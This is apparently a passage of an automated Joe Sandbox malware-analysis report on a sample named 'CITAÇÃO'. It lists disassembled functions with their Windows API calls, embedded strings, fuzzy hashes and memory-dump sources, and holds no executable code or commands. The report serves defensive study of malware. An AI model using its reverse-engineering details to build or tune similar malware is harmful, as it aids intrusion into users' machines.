                                                      • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                      • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                      • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                      Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                      • GetMenuItemCount.USER32(?), ref: 00468C45
                                                      • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                      • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                      • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                      • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                      • GetMenuItemCount.USER32 ref: 00468CFD
                                                      • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                      • GetCursorPos.USER32(?), ref: 00468D3F
                                                      • SetForegroundWindow.USER32(?), ref: 00468D49
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 1441871840-4108050209
                                                      • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                      • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                      • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                      • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                      Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                      • __swprintf.LIBCMT ref: 00460915
                                                      • __swprintf.LIBCMT ref: 0046092D
                                                      • _wprintf.LIBCMT ref: 004609E1
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 3631882475-2268648507
                                                      • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                      • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                      • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                      • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                      Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                      • SendMessageW.USER32 ref: 00471740
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                      • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                      • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                      • SendMessageW.USER32 ref: 0047184F
                                                      • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                      • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                      • String ID:
                                                      • API String ID: 4116747274-0
                                                      • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                      • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                      • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                      • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                      Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                      • _wcslen.LIBCMT ref: 00461683
                                                      • __swprintf.LIBCMT ref: 00461721
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                      • GetDlgCtrlID.USER32(?), ref: 00461869
                                                      • GetWindowRect.USER32(?,?), ref: 004618A4
                                                      • GetParent.USER32(?), ref: 004618C3
                                                      • ScreenToClient.USER32(00000000), ref: 004618CA
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                      • String ID: %s%u
                                                      • API String ID: 1899580136-679674701
                                                      • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                      • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                      • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                      • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                      Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                      • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu$Sleep
                                                      • String ID: 0
                                                      • API String ID: 1196289194-4108050209
                                                      • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                      • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                      • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                      • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                      Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0043143E
                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                      • SelectObject.GDI32(00000000,?), ref: 00431466
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                      • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                      • String ID: (
                                                      • API String ID: 3300687185-3887548279
                                                      • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                      • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                      • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                      • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                      Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                        • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                      • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 1976180769-4113822522
                                                      • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                      • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                      • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                      • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                      Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                      • String ID:
                                                      • API String ID: 461458858-0
                                                      • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                      • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                      • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                      • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                      Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                      • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                      • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                      • DeleteObject.GDI32(?), ref: 004301D0
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3969911579-0
                                                      • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                      • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                      • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                      • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                      Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                      • String ID: 0
                                                      • API String ID: 956284711-4108050209
                                                      • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                      • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                      • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                      • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                      Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 1965227024-3771769585
                                                      • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                      • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                      • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                      • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                      Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 369157077-1007645807
                                                      • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                      • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
